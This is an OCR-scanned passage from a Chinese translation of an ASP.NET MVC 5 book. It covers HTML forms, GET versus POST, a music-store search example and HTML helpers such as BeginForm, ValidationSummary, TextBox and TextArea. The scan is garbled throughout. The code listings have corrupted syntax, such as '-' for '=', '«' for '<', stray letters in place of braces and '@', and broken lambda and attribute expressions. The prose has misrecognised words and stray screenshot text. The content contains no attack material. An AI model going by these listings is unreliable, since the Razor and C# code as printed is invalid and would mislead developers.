自 带 的 所 有 基 架 都 是 基于 实体 框架 运作 的 ， 但 是 基 架 是 可 扩展 并 可 自 定义 的 ， 所 以 基 架 可 以 
和 各 种 技术 一 起 使 用 。 

本 章 后 面部 分 还 探讨 了 模型 绑 定 , 现在 应 该 理解 了 如 何 使 用 模型 绑 定 特性 (而 不 是 在 整个 
表单 集合 中 挖 取 ) 来 捕获 请 求 中 的 值 ， 也 应 该 知道 如 何 查询 控制 器 操作 中 的 字符 串 。 而 后 对 重 
复 提交 攻击 中 的 模型 绑 定 进行 了 简单 介绍 ， 这 些 内 容 在 后 面 第 7 章 中 会 进行 详细 介绍 。 

然而 ， 此 时 只 是 了 解 了 模型 对 象 如 何 驱动 应 用 程序 的 一 点 皮毛 。 在 接 下 来 的 几 章 中 ,将 
会 进一步 讲解 模型 及 其 相关 元 数据 是 如 何 影响 HTML 辅 助 方法 的 输出 以 及 如 何 影响 验证 的 。 


第 * 
表单 和 HTML 辅 助 方法 


本 章 主要 内 容 

e 理解 表单 

e 如 何 利 用 HTML 辅助 方法 
e 编辑 和 输入 的 辅助 方法 

e 显示 和 泻 染 的 辅助 方法 


本 章 代 码 下 载 : 
在 以 下 网 址 的 Download Code 选 项 卡 中 , 可 找到 本 章 的 代码 下 载 : http://www.wrox.com/go/ 
proaspnetmvc5。 本 章 的 代码 包含 在 文件 Wrox.ProMvcs.C05.zip 中 。 


顾名思义 ，HTML 辅助 方法 是 用 来 辅助 HTML 开 发 的 。 这 里 可 能 有 一 个 疑问 : 诸如 向 文 
本 编辑 器 中 输入 HIML 元素 如 此 简单 的 任务 ， 还 需要 任何 帮助 吗 ? 输入 标签 名 称 是 很 容易 的 
事情 ， 但 是 确保 HTML 页面 链接 中 的 URL 指 向 正确 的 位 置 、 表 单元 素 拥有 适用 于 模型 绑 定 的 
合适 名 称 和 值 ， 以 及 当 模 型 绑 定 失败 时 其 他 元 素 能 够 显示 相应 的 错误 提示 消息 ， 这 些 才 是 使 
用 HIML 的 难点 。 

实现 所 有 这 些 方面 仅 靠 HTML 标 记 是 远 远 不 够 的 ， 还 需要 视图 和 运行 环境 之 间 的 协调 配 
合 。 学 习 了 本 章 ， 就 可 以 很 容易 地 实现 它们 之 间 的 协调 。 然 而 ， 在 学 习 辅 助 方法 之 前 ， 首 先 
要 学 习 表单 。 应 用 程序 中 大 部 分 的 困难 工作 都 是 在 表单 中 完成 的 , 同时 表单 也 是 最 需要 HTML 
辅助 方法 的 地 方 。 


5.1 表单 的 使 用 
这 里 我 们 可 能 会 疑惑 面向 专业 Web 开 发 人 员 的 图 书 为 什么 还 要 浪费 笔墨 讲解 HIML 的 


form 标 签 ， 难 道 它 不 容易 理解 吗 ? 
这 么 做 有 两 个 原因 。 
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e form 标签 是 强大 的 :如 果 没 有 form 标签 , Internet 将 变 成 一 个 枯燥 文档 的 只 读 存储 库 。 
你 将 不 能 进行 网 上 搜索 ,也 不 能 在 网 上 购买 任何 东西 。 如果 一 个 邪恶 的 神偷 今 晚 盗 取 
了 每 一 个 网 站 的 form 标签 ， 那 么 文明 将 于 明天 午餐 时 分 消失 殉 尽 。 

e 许多 转向 MVC 框架 的 开发 人 员 都 已 经 使 用 过 ASP.NET Web Forms: Web Forms 没 
有 完全 利用 form 标签 的 强大 功能 (也 可 以 说 是 Web Forms 为 实现 自己 的 目标 才 管 理 和 
利用 form 标签 的 )。 所 以 应 该 原谅 那些 忘记 form 标签 功能 (例如 创建 HTTP GET 请 求 
的 功能 ) 的 Web Forms 开发 人 员 。 


5.1.1 action 和 method 特 性 


表单 是 包含 输入 元 素 的 容器 ， 其 中 包含 按钮 、 复 选 框 、 文 本 框 等 元 素 。 表 单 中 的 这 些 输 
入 元 素 使 得 用 户 能 够 向 页 面 中 输入 信息 ， 并 把 输入 的 信息 提交 给 服务 器 。 但 是 提交 给 什么 服 
务 器 呢 ? 这 些 信 息 又 是 如 何 到 达 服 务 器 的 呢 ? 这 些 问 题 的 答案 就 在 两 个 非常 重要 的 form 标 签 
特性 中 ， 即 action 和 method 特 性 。 

action 特 性 用 以 告知 Web 浏 览 器 信息 发 往 哪 里 ， 所 以 action 就 顺理成章 地 包含 一 个 URL 。 
这 里 的 URL 可 以 是 相对 的 ， 但 当 向 一 个 不 同 的 应 用 程序 或 服务 器 发 送信 息 时 ， 它 也 可 以 是 绝 
对 的 。 下 面 的 form 标 签 将 可 以 从 任何 应 用 程序 中 向 站 点 www.bing.com 的 search 页 面 发 送 一 个 
搜索 词 (输入 元 素 的 名 称 为 q): 

<form action="http://www.bing.com/search"> 

«input name-"q" type-"text" /> 


«input type-"submit" value-"Search!" /> 
«/form» 


显而易见 ， 上 面 代码 段 中 的 form 标 签 不 包含 method 特 性 。 当 发 送信 息 时 ，method 特 性 可 
以 告知 浏览 器 是 使 用 HTTP POST 还 是 使 用 HITP GET。 现 在 可 能 会 认为 表单 默认 的 方法 是 
HTTP POST。 毕 竟 经 常 通过 提交 表单 来 更 新 自己 的 资料 , 提交 信用 卡 信息 来 购物 和 对 YouTube 
上 有 趣 的 动物 视频 发 表 评 论 。 然 而 ， 尽 管 如 此 ， 默 认 方 法 仍 是 “get”， 所 以 默认 情况 下 表单 
发 送 的 是 HTTP GET 请 求 。 


<form action-"http://www.bing.com/search" method-"get"» 
«input name-"q" type-"text" /» 
«input type-"submit" value-"Search!" /» 
</form> 
当 用 户 使 用 HTTP GET 请 求 提交 表单 时 ， 浏 览 器 会 提取 表单 中 输入 元 素 的 name 特 性 值 及 
其 相应 的 value 特 性 值 ， 并 将 它们 放 入 到 查询 字符 串 中 。 换 句 话说 ， 上 面 的 表单 将 把 浏览 器 导航 
到 URL( 假 设 用 户 正 在 搜索 关键 词 love): http://www.bing.com/search?q=]love。 


5.1.2 GET 方法 还 是 POST 方 法 


如 果 不 想 让 浏览 器 把 输入 值 放 入 查询 字符 串 中 ， 而 是 想 放 入 HTTP 请 求 的 主体 中 ， 就 可 
以 给 method 特 性 赋值 post。 尽 管 这 样 也 可 以 成 功 地 向 搜索 引擎 发 送 POST 请 求 并 能 看 到 相应 
的 搜索 结果 ， 但 是 相对 而 言 ， 使 用 HTTP GET 请 求 会 更 好 一 些 。 不 像 POST 请 求 ，GET 请 求 的 
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所 有 参数 都 在 URIL 中 ， 因 此 可 以 为 GET 请 求 建立 书签 。 可 以 在 电子 邮件 或 网 页 中 将 这 些 URL 
作为 超 链 接 来 使 用 ， 除 此 之 外 ， 还 可 以 保留 所 有 的 表单 输入 值 。 

更 重要 的 是 ， 因 为 GET 方 法 代表 的 是 寡 等 操作 和 只 读 操作 ， 所 以 它 是 做 这 些 工 作 的 最 好 
选择 。 换 而 言 之 ， 因 为 GET 不 会 (或 不 应 该 ) 改 变 服务 器 上 的 状态 ， 所 以 客户 端 可 以 向 服务 器 


重复 地 发 送 GET 请 求 而 不 会 产生 负面 影响 。 


另 一 方面 ，POST 请 求 可 以 用 来 提交 信用 卡 交易 信息 、 向 购物 车 中 添加 专辑 或 者 修改 密 


码 等 .POST 请 求 通常 情况 下 会 改变 服务 器 上 
的 状态 , 重复 提交 POST 请 求 可 能 会 产生 不 良 
后 果 ( 比 如 购物 时 ， 由 于 重复 提交 两 次 POST 


DE x 
Confirm Form Resubmission 


The page that you're locking for used information that you 


entered. Returning to that page might cause any action you 
took to be repeated. Do you want to continue? 


请 求 ， 而 产生 两 个 订单 )。 许 多 浏览 器 现在 都 
可 以 帮助 用 户 避 免 重复 提交 POST 请 求 。 图 
5-1 展 示 了 Chrome 浏 览 器 在 刷新 POST 请 求 


时 的 反应 。 j 图 5-1 


Continue Cancel 


注意 因为 Chrome 更 新 很 快 ， 所 以 读者 看 到 的 消息 可 能 与 这 里 显示 的 截图 有 所 


区 别 。 


通常 情况 下 ， 在 Web 应 用 程序 中 ，GET 请 求 用 于 读 操作 ，POST 请 求 用 于 写 操 作 (通常 包 
括 更 新 、 创 建 和 删除 )。 为 音乐 付款 就 使 用 POST 请 求 ， 接 下 来 将 要 看 到 的 查询 音乐 情形 ， 就 
需要 使 用 GET 请 求 。 


1. 用 搜索 表单 搜索 音乐 
假设 现在 想 要 让 音乐 商店 的 顾客 可 以 在 音乐 商店 应 用 程序 的 首页 搜索 音乐 。 与 前 面 搜索 


引擎 的 例子 类 似 ， 这 里 也 需要 一 个 带 有 action 和 method 特 性 的 表单 。 程 序 清单 5-1 中 显示 的 
HIML 将 添加 一 个 简单 的 搜索 表单 。 


程序 清单 5-1 ”搜索 表单 


«form action-"/Home/Search" method="get"> 
«input type-"text" name-"q" /> 
«input type-"submit" value-"Search" /» 
</form> 


注意 本 节 将 基于 完整 的 Music Store, 通过 几 个 例子 演示 在 表单 中 使 用 GET 方 法 
而 不 是 POST 方法 。 读 者 不 必 输 入 这 些 代码 。 


下 一 步 就 是 在 HomeController 控 制 器 中 实现 Search 方 法 。 程 序 清单 5-2 中 的 代码 块 对 音乐 
搜索 做 了 最 简单 的 假定 ， 假 设 用 户 总 是 用 专辑 名 称 来 搜索 音乐 : 


程序 清单 5-2 ”Search 控 制 器 操作 


public ActionResult Search(string q) 
t 
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var albums = storeDB.Albums 
-Include ("Artist") 
.Where(a => a.Title.Contains (q)) 
-Take (10) ; 
return View (albums); 
$ 


注意 ， 这 里 的 Search 操 作 希 望 接收 名 为 q 的 字符 串 参数 。 当 gq 出 现时 ，ASPNET MVC 框 架 
会 自动 在 查询 字符 串 中 找到 这 个 值 ; 即便 搜索 表单 发 出 的 是 POST 请 求 而 非 GET 请 求 , 搜索 引 
擎 也 会 在 提交 的 表单 中 找到 这 个 值 。 
由 控制 器 告知 ASPNET MVC 框 架 泻 染 视图 。 程 序 清单 5-3 给 出 了 一 个 示例 视图 的 代码 ， 
这 段 代码 将 泻 染 搜索 结果 。 我们 向 table 标 签 添加 了 一 些 Bootstrap 类 , 使 其 看 上 去 更 好 看 一 些 。 


程序 清单 5-3 ”搜索 结果 视图 

@model IEnumerable«MvcMusicStore.Models.Album» 
@{ ViewBag.Title = "Search"; } 
<h2>Results</h2> 


<table class="table table-condensed table-striped"> 
<tr> 
<th>Artist</th> 
<th>Title</th> 
<th>Price</th> 
</tr> 


Gforeach (var item in Model) ( 
«tr» 
«td»QGitem.Artist.Name«/td» 
«td»QGitem.Title«/td» 
«td»8String.Format("([0:c)", item.Price)«/td» 
«/tr» 
) 
«/table» 


假设 顾客 在 搜索 输入 框 中 输入 搜索 关键 字 “work”， 输 出 的 搜索 结果 将 如 图 $-2 所 示 。 


< ID [EEC ax n 
会 EB WebStes Symcup Status E Loading.. E) + Add to Delicious E) RSVP E) Squin 


Results 
Artist Tte 
Men At Work The Best Of The Men At Work 


Dan Punk Homework 


Martin Roscoe Szymanowski: Plano Works, Vol. 1 
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上 面 的 搜索 示例 展示 了 在 ASPNET MVC 框 架 中 使 用 HIML 表单 的 简易 性 。Web 浏 览 器 从 
表单 中 收集 用 户 输入 信息 并 向 MVC 应 用 程序 发 送 一 个 请 求 ， 这 里 的 MVC 运 行 时 可 以 自动 地 
将 这 些 输入 值 传递 给 要 响应 的 操作 方法 的 参数 。 

当然 ， 并 非 所 有 的 情形 都 与 搜索 表单 一 样 容易 。 事 实 上 ， 刚 才 是 将 搜索 表单 简化 到 了 很 
脆弱 的 程度 。 如 果 把 刚才 的 应 用 程序 部 署 到 一 个 非 网 站 根 目录 的 目录 中 ， 或 者 修改 了 路 由 定 
义 ,那么 刚才 手动 编写 的 操作 值 可 能 会 把 用 户 的 浏览 器 导航 到 一 个 网 站 上 并 不 存在 的 资源 处 。 
请 记 住 ， 刚 才 已 经 把 “Home/Search” 赋 值 给 了 表单 的 action 特 性 。 

Xform action-"/Home/Search" method="get"> 

<input type="text" name-"q" /> 


«input type-"submit" value-"Search" /» 
«/form» 


2. 通过 计算 action 特性 值 来 搜索 音乐 
更 好 的 办 法 是 通过 计算 action 特 性 的 值 来 搜索 音乐 有 一 个 HTML 辅助 方法 可 以 代劳 自动 
完成 这 个 计算 ， 如 下 所 示 。 


eusing (Html.BeginForm("Search", "Home", FormMethod.Get)) ( 
<input type="text" name-"q" /> 
«input type-"submit" value-"Search" /» 


) 


BeginForm HTML 辅 助 方法 利用 路 由 引擎 找到 HomeController 控 制 器 的 Search 操 作 。 它 在 
后 台 使 用 GetVirtualPath 方 法 ， 该 方法 在 RouteTable 的 Routes 属 性 中 一 一 在 globalasax 中 ，Web 
应 用 程序 注册 所 有 路 由 的 位 置 。 如 果 不 采 用 HTML 辅助 方法 , 将 不 得 不 编写 下 面 的 所 有 代码 : 


er 
var context - this.ViewContext.RequestContext; 
var values - new RouteValueDictionary( 
( "controller", "home" }, ( "action", "index" } 
n 
var path - RouteTable.Routes.GetVirtualPath(context, values); 


} 

«form action-"(path.VirtualPath" method="get"> 
«input type-"text" name-"q" /> 
«input type-"submit" value-"Search2" /» 


«/form» 


最 后 一 个 例子 展示 了 HIML 辅助 方法 的 本 质 : 它们 不 是 夺 去 了 程序 员 的 控制 权 ， 而 是 让 
他 们 从 大 量 的 编码 工作 中 解脱 出 来 。 


5.2 HTML 辅助 方法 


可 以 通过 视图 的 Html 属 性 调用 HIML 辅助 方法 。 相 应 地 ， 也 可 以 通过 Url 属性 调用 URL 
辅助 方法 ， 通 过 Ajax 属性 调用 Ajax 辅助 方法 。 所 有 这 些 方法 都 有 一 个 共同 的 目标 : 使 视图 编 
码 变 得 容易 。 在 控制 器 中 也 存在 有 URIL 辅助 方法 。 
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大 部 分 的 辅助 方法 都 输出 HTML 标记 , 尤其 是 HIMI 辅助 方法 .例如 , 前 面 提 到 BeginForm 
辅助 方法 可 以 用 来 为 搜索 表单 构建 一 个 强壮 的 表单 标签 ， 而 不 必 编写 很 多 代码 : 
Qusing (Html.BeginForm("Search", "Home", FormMethod.Get)) ( 
«input type-"text" name-"q" /> 
«input type-"submit" value-"Search" /» 
} 
BeginForm 辅 助 方法 输出 的 标记 很 可 能 与 前 面 第 一 次 实现 搜索 表单 时 一 样 。 然 而 ， 在 后 
台 ， 该 辅助 方法 与 路 由 引擎 协调 工作 来 生成 合适 的 URL， 从 而 当 应 用 程序 部 署 位 置 发 生 改 变 
时 ， 使 代码 更 富有 弹性 。 
注意 ，BeginForm 辅 助 方 法 输出 的 是 起 始 <form> 和 结束 </form> 标 签 。 辅 助 方法 在 调用 
BeginForm 期 间 生成 一 个 起 始 标签 ， 并 返回 一 个 实现 了 接口 IDisposable 的 对 象 。 当 视图 中 的 代 
码 执行 到 结束 using 语 句 的 花 括 号 位 置 时 ， 由 于 隐 式 调用 了 Dispose 方 法 , 因此 辅助 方法 会 生成 
一 个 </form> 标 签 。 这 里 using 语 句 使 得 代码 简洁 而 优雅 。 如 果 发 现 这样 不 适合 自己 ， 也 可 以 
使 用 下 面 的 方法 ， 它 的 代码 看 起 来 前 后 对 称 : 
G(Html.BeginForm("Search", "Home", FormMethod.Get);) 
<input type="text" name-"q" /> 
«input type-"submit" value-"Search" /» 
G(Html.EndForm();) 
乍 一 看 , 辅助 方法 (比如 BeginForm) 好 像 使 程序 员 远 离 了 王牌 一 一 许多 程序 员 想 控制 的 低 
级 HTML。 一 旦 开始 使 用 辅助 方法 ， 就 会 意识 到 它们 在 保持 高 效率 的 同时 还 与 王牌 保持 近 距 
离 接触 。 换 句 话说 ， 我 们 在 不 必 编 写 很 多 代码 来 处 理 细 节 问 题 的 情况 下 ， 仍 然 可 以 完全 控制 
HTML. 辅助 方法 除了 能 生成 尖 括 号 之 外 ， 还 能 正确 地 编码 特性 ， 构 建 指 向 正确 资源 的 URL， 
设置 输入 元 素 的 名 称 以 简化 模型 绑 定 。 总 之 ， 辅 助 方法 是 程序 员 的 好 朋友 ! 


52.1 自动 编码 


像 任何 其 他 好 朋友 一 样 ，HTML 辅助 方法 可 以 帮助 我 们 摆脱 困境 。 本 章 介绍 的 许多 辅助 
方法 都 可 以 用 来 输出 模型 值 。 所 有 这 些 输出 模型 值 的 辅助 方法 都 会 在 泻 染 之 前 ， 对 值 进行 
HTML 编码 。 例 如 ， 后 面 的 TextArea 辅 助 方法 ， 用 来 输出 HTML 元 素 textarea: 


QHtml.TextArea("text", "hello <br/> world") 


TextArea 辅 助 方法 中 的 第 二 个 参数 是 要 泻 染 的 值 。 上 面 例子 是 向 它 的 值 中 嵌入 一 些 
HTML 标记 ， 但 TextArea 辅 助 方法 会 产生 下 面 的 标记 : 
<textarea cols-"20" id-"text" name-"text" rows="2"> 
hello &lt;br /&gt; world 
«/textarea» 
注意 输出 值 是 经 过 HIML 编码 的 。 默 认 的 编码 可 以 帮助 避免 跨 站 点 脚本 攻击 (Cross Site 
Scripting，XSS)。 第 7 章 将 深入 介绍 跨 站 点 脚本 攻击 。 
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5.2.2 ”辅助 方法 的 使 用 
在 保护 代码 的 同时 ， 辅 助 方法 也 给 出 了 适当 程度 的 控制 。 为 了 展示 辅助 方法 的 作用 ， 下 
列 出 了 BeginForm 辅 助 方法 的 另 一 个 重 载 版 本 : 


Qusing (Html.BeginForm("Search", "Home", FormMethod.Get, 
new ( target = " blank" ])) 


' <input type="text" name="q" /> 
<input type="submit" value="Search" /> 

} 

在 这 段 代 码 中 ， 向 BeginForm 方 法 的 htmlAttributes 参 数 传递 了 一 个 匿名 类 型 的 对 象 。 在 
ASPNET MVC 框 架 的 重 载 版 本 中 ， 几 乎 每 一 个 HIMLI 辅助 方法 都 包含 htmlAttributes 参 数 。 有 
时 也 可 以 发 现在 某 些 重 载 版 本 中 htmlAttributes 参 数 的 类 型 是 IDictionary<string, object>。 辅 助 
方法 利用 字典 条 目 (在 对 象 参数 的 情形 下 ， 就 是 对 象 的 属性 名 称 和 属性 值 ) 创 建 辅助 方法 生成 
元 素 的 特性 。 例 如 ， 上 面 的 代码 可 生成 如 下 所 示 的 起 始 form 标 签 : 


<form action="/Home/Search" method="get" target=" blank"> 


可 以 看 到 上 面 使 用 htmlAttributes 参 数 设置 了 target="_blank"。 事 实 上 ， 我 们 可 以 使 
htmlAttributes 参 数 设置 许多 必要 的 特性 值 。 一 开始 可 能 会 觉得 有 些 特性 存在 问题 。 例 如 ， 设 
置 元 素 的 class 特 性 就 要 求 匿名 类 型 对 象 上 必须 有 一 个 名 为 class 的 属性 ， 或 者 值 的 字典 中 有 一 
个 名 为 class 的 键 。 在 字典 中 有 一 个 “class” 的 键 值 不 是 问题 ， 问 题 在 于 对 象 中 带 有 一 个 名 为 
class 的 属性 。 因 为 class 是 C# 语 言 中 的 一 个 保留 关键 字 ， 不 能 用 作 属 性 名 称 或 标识 符 ， 所 以 必 
须 在 class 前 面 加 一 个 @ 符 号 作为 前 级 : 


eusing (Html.BeginForm("Search", "Home", FormMethod.Get, 
new ( target - " blank", Gclass-"editForm" }) ) 


另 一 个 问题 是 将 属性 设置 为 带 有 连 字符 的 名 称 ( 像 data-vaD)。 在 第 8 章 介 绍 框架 的 Ajax 特性 时 ， 
将 看 到 带 有 连 字 符 的 属性 名 。 带 有 连 字符 的 C# 属 性 名 是 无 效 的， 但 所 有 的 HTML 辅助 方 法 在 
泻 染 HTML 时 会 将 属性 名 中 的 下 划 线 转换 为 连 字符 。 例 如 ， 执 行 下 面 的 视图 代码 ; 


eusing (Html.BeginForm("Search", "Home", FormMethod.Get, 
new ( target = " blank", Gclass-"editForm", data validatable-true })) 


将 生成 如 下 的 HTML 代码 : 


«form action-"/Home/Search" class-"editForm" data-validatable-"true" 
method-"get" target-" blank"» 


接 下 来 的 一 节 介绍 辅助 方法 的 工作 原理 以 及 其 他 一 些 内 置 辅助 方法 。 


5.2.3 ” HTML 辅助 方法 的 工作 原理 


每 一 个 Razor 视 图 都 继承 了 它们 基 类 的 Html 属 性 。Html 属 性 的 类 型 是 System Web.Mvc. 
HtmlHelper<T>， 这 里 的 T 是 一 个 泛 型 类 型 的 参数 ， 代 表 传 递 给 视图 的 模型 类 型 (默认 是 
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dynamic). 这 个 属性 提供 了 一 些 可 以 在 视图 中 调用 的 实例 方法 , 比如 EnableClientValidation GA 

择 性 地 开启 或 关闭 视图 中 的 客户 端 验 证 )。 然 而 ， 上 一 节 中 使 用 的 BeginForm 方 法 并 不 在 这 些 

实例 方法 之 中 。 事 实 上 ， 框 架 定义 的 大 多 数 辅助 方法 都 是 扩展 方法 。 
在 智能 感知 窗口 中 , 当 方法 名 称 左边 有 一 个 向 下 的 箭 | 


头 (如 图 5-3 所 示 ) 时 ， 就 说 明 这 个 方法 是 一 个 扩展 方法 。 从 RN j 
图 5-3 可 以 看 出 ，AntiForgeryToken 是 一 个 实例 方法 ， Be 
BeginForm 是 一 个 扩展 方法 。 re 
为 了 构建 HTML 辅 助 方法 体系 ， 扩 展 方法 是 一 种 极 Bere 
其 美妙 的 构建 方式 ， 这 主要 有 两 个 原因 。 首 先 ， 在 C# 的 ed à 


扩展 方法 中 只 有 当 在 它 的 名 称 空间 范围 内 ， 才 能 调用 。 
ASPNET MVC 所 有 的 HtmlHelper 扩 展 方法 都 在 名 称 空间 System.Web.Mvc .Html 中 ( 缘 于 文件 
Views/web. config 中 使 用 的 一 个 名 称 空间 条 目 ， 默 认 情况 下 都 在 该 名 称 空间 中 )。 如 果 不 喜 欢 
这 些 内 置 的 扩展 方法 ， 可 以 删除 这 个 名 称 空间 ， 构 建 自己 的 方法 。 

然后 ,“ 构 建 自己 的 方法 ”这 人 句 话 带 来 了 将 辅助 方法 作为 扩展 方法 的 第 二 个 好 处 。 我 们 
可 以 构建 自己 的 扩展 方法 来 代 蔡 或 增强 内 置 的 辅助 方法 。 第 15 章 会 介绍 如 何 构 建 自 定义 的 辅 
助 方法 。 下 面 将 介绍 开 箱 即 用 的 辅助 方法 。 


524 设置 专辑 编辑 表单 


如 果 需 要 创建 一 个 视图 ， 用 来 让 用 户 编辑 专辑 信息 。 可 以 从 下 面 的 视图 代码 开始 : 


eusing (Html.BeginForm()) { 
GHtml.ValidationSummary (excludePropertyErrors: true) 
«fieldset» 
Xlegend»Edit Album«/legend» 


<p> 
<input type="submit" value="Save" /> 
</p> 
</fieldset> 
} 


这 段 代 码 包 含有 两 个 辅助 方法 : Html.BeginFormfilHtml.ValidationSummary. | F ifti 4) 3f 
它们 进行 介绍 。 
1. Html.BeginForm 
前 面 示例 已 经 涉及 BeginForm 辅 助 方法 。 在 上 面 的 代码 中 ， 不 带 参数 的 BeginForm 辅 助 方 


法 向 当前 URIL 发 送 一 个 HITP POST 请 求 ， 如 果 视 图 响应 了 /StoreManager/Edit/52， 那 么 起 始 
form 标 签 的 代码 如 下 所 示 : 


<form action-"/StoreManager/Edit/52" method="post"> 


这 种 情形 下 ，POST 就 是 理想 的 请 求 类 型 ， 因 为 这 里 将 要 修改 服务 器 上 的 专辑 信息 。 
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2. Html.ValidationSummary 


ValidationSummary 辅 助 方法 可 以 用 来 显示 ModelState 字 典 中 所 有 验证 错误 的 无 序列 表 。 
使 用 布尔 类 型 参数 ( 值 为 rue) 来 告知 辅助 方法 排除 属性 级 别 的 错误 。 换 而 言 之 ， 就 是 告知 
ValidationSummary 方 法 只 显示 ModelState 中 与 模型 本 身 有 关 的 错误 ， 而 不 显示 那些 与 具体 模 
型 属性 相关 的 错误 。 这 里 将 分 开 显示 属性 级 别 的 错误 。 

假设 在 控制 器 操作 中 的 某 处 有 如 下 用 来 泻 染 编辑 视图 的 代码 : 


ModelState.AddModelError("", "This is all wrong!"); 
ModelState.AddModelError("Title", "What a terrible name!"); 


第 一 个 是 模型 级 别 的 错误 ， 因 为 代码 中 没有 提供 错误 与 特定 属性 关联 的 键 (或 者 一 个 空 
键 )。 第 二 个 是 与 Title 属 性 相关 联 的 错误 ， 因 此 ， 在 视图 中 的 验证 摘要 区 域 不 会 显示 这 个 错误 
(除非 从 辅助 方法 中 删除 参数 “Title” 或 者 把 方法 ValidationSummary 的 参数 值 改 为 alse)。 在 这 
种 情形 下 ， 辅 助 方法 泻 染 如 下 所 示 的 HTML 标 记 : 

<div class="validation-summary-errors"> 

<ul> 
«li»This is all wrong!«/li» 
«/ul» 

</div> 

ValidationSummary 辅 助 方法 的 其 他 重 载 版 本 可 以 提供 标题 文本 ， 也 可 以 设置 特定 的 
HIML 特 性。 


O 注意 ”按照 惯例 ，ValidationSummary 辅 助 方 法 会 让 CSS 类 validation-summary- | 
errors 和 提供 的 任何 特定 CSS 类 一 起 泻 染 。 默认 的 ASPNET MVC 项 目 模板 包含 一 
些 样式 ， 使 得 这 些 项 以 红色 显示 ， 如 果 不 喜欢 这 些 样 式 ， 可 以 在 文件 styles.css 
中 进行 修改 。 | 


5.2.5 “添加 输入 元 素 


一 旦 表单 和 验证 摘要 设计 完成 ， 就 可 以 在 视图 中 添加 一 些 输入 元 素 让 用 户 来 输入 专辑 信 
息 。 一 种 方法 是 使 用 第 4 章 的 基 架 Edit 视 图 (参见 43.1 节 )。 程 序 清单 54 显 示 了 StoreManager 
Edit.cshtml 视 图 代码 的 表单 部 分 ， 并 突出 显示 了 输入 辅助 方法 : 


程序 清单 5-4 StoreManager Edit.cshtml 


@using (Html.BeginForm()) 


{ 
@Html .AntiForgeryToken () 


«div class="form-horizontal"> 
<h4>Album</h4> 
<hr /> 
GHtml.ValidationSummary (true) 
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GHtml.HiddenFor (model => model.Albumid) 


«div class-"form-group"» 
GHtml.LabelFor (model => model.GenreId, 
"GenreId", 
new ( Gclass = "control-label col-md-2" }) 
«div class-"col-md-10"» 
GHtml.DropDownList("GenreId", String.Empty) 
GHtml.ValidationMessageFor (model => model.GenreId) 
«/div» 
«/div» 


<div class-"form-group"» 
GHtml.LabelFor(model => model.ArtistId, 
"ArtistId", 
new ( @class = "control-label col-md-2" ]) 
«div class-"col-md-10"» 
GHtml.DropDownList("ArtistId", String.Empty) 
GHtml.ValidationMessageFor (model => model.ArtistId) 
«/div» 
</div> 


<div class="form-group"> 
@Html.LabelFor (model => 
model.Title, 
new { @class = "control-label col-md-2" }) 
<div class="col-md-10"> 
@Html .EditorFor (model => model.Title) 
GHtml.ValidationMessageFor (model => model.Title) 
</div> 
</div> 


<div class="form-group"> 
@Html .LabelFor (model => model.Price, 
new { @class = "control-label col-md-2" }) 
<div class="col-md-10"> 
@Html .EditorFor (model => model.Price) 
GHtml.ValidationMessageFor (model => model.Price) 
</div> 
</div> 


<div class="form-group"> 
@Html.LabelFor (model => model.AlbumArtUrl, 
new { @class = "control-label col-md-2" }) 
<div class-"col-md-10"» 
@Html .EditorFor (model => model.AlbumArtUrl) 
GHtml.ValidationMessageFor (model => model.AlbumArtUrl) 
</div> 
</div> 


<div class="form-group"> 
<div class="col-md-offset-2 col-md-10"> 
<input type="submit" value="Save" class="btn btn-default" /> 
</div> 
</div> 
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} 


</div> 


这 些 辅助 方法 会 向 用 户 展示 如 下 界面 (如 图 5-4 所 示 ): 


* 古 


Edit 
Album 
Genreld 
Rock V 


Artistid 
Rush v 


Tte 
[Caravan 


Price. 


[9.99 


AlbumArturl 


Save 


Back to List 


02014 - My ASP.NET Application 


图 5-4 


视图 中 包含 如 下 新 的 辅助 方法 : 


本 


LabelFor 
DropDownList 
ValidationMessageFor 
ValidationSummary 
HiddenFor 


节 会 讨论 所 有 这 些 辅 助 方法 ， 以 及 其 他 一 些 辅助 方法 。 下 面 首先 介绍 最 简单 的 输入 


HTML 辅 助 方 法 : TextBox 辅 助 方法 。 
1. Html.TextBox 和 Html.TextArea 


TextBox 辅 助 方法 泻 染 一 个 type 特 性 为 text 的 input 标 签 。 我 们 一 般 利 用 TextBox 辅 助 方法 接 
收 用 户 自由 形式 的 输入 。 例 如 ， 下 面 形式 的 调用 : 


QHtml.TextBox("Title", Model.Title) 


会 生成 如 下 所 示 的 HTML 标记 : 


«input id-"Title" name-"Title" type-"text" 


与 


value-"For Those About To Rock We Salute You" /> 


其 他 的 HIML 辅助 方法 类 似 ，TextBox 辅 助 方法 也 为 一 些 HIML 特性 设置 (正如 本 章 前 


面 演示 的 ) 提 供 了 重 载 。TextBox 辅 助 方法 的 一 个 兄弟 方法 就 是 TextArea 辅 助 方法 。 下 面 的 代码 
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演示 了 使 用 TextArea 方 法 泻 染 一 个 能 够 显示 多 行文 本 的 <textarea> 元 素 : 
QHtml .TextRArea ("text", "hello <br/> world") 
上 述 代 码 演 染 的 HTML 标记 如 下 : 
«textarea cols-"20" id-"text" name-"text" rows="2">hello &lt;br /&gt; world 


«/textarea» 

再 次 注意 , 辅助 方法 如 何 将 值 编码 为 输出 形式 (所 有 的 辅助 方法 都 对 模型 值 和 特性 值 进行 
编码 )。TextArea 辅 助 方法 的 其 他 重 载 版 本 可 以 通过 指定 显示 的 行 数 和 列 数 来 控制 文本 区 域 的 
大 小 : 

QHtml.TextArea("text", "hello «br /> world", 10, 80, null) 

这 行 代码 将 生成 如 下 所 示 的 HTML 标记: 


«textarea cols-"80" id-"text" name-"text" rows-"10"»hello &lt;br /&gt; world 


«/textarea» 
2. HTML.Label 
Label 辅 助 方法 返回 一 个 <label/> 元 素 ， 并 使 用 String 类 型 的 参数 来 决定 泻 染 的 文本 和 for 


特性 值 。 它 的 一 个 重 载 版 本 允许 独立 地 设置 for 特 性 和 要 演 染 的 文本 。 在 上 面 的 代码 中 ， 调 用 
Html.Label("GenreId") 会 生成 如 下 所 示 的 HTML 标 记 : 


<label for="GenreId">Genre</label> 


如 果 以 前 没有 使 用 过 label 元 素 ， 那 么 现在 可 能 极 想 知道 这 个 元 素 是 否 有 存在 的 价值 。 其 
实 ，label 的 作用 就 是 为 其 他 输入 元 素 ( 比 如 文本 输入 元 素 ) 显 示 附 加 信息 ， 这 样 可 以 为 用 户 提 
供 人 性 化 的 界面 ， 从 而 增强 应 用 程序 的 可 访问 性 。label 的 for 特 性 应 该 包含 相关 输入 元 素 的 
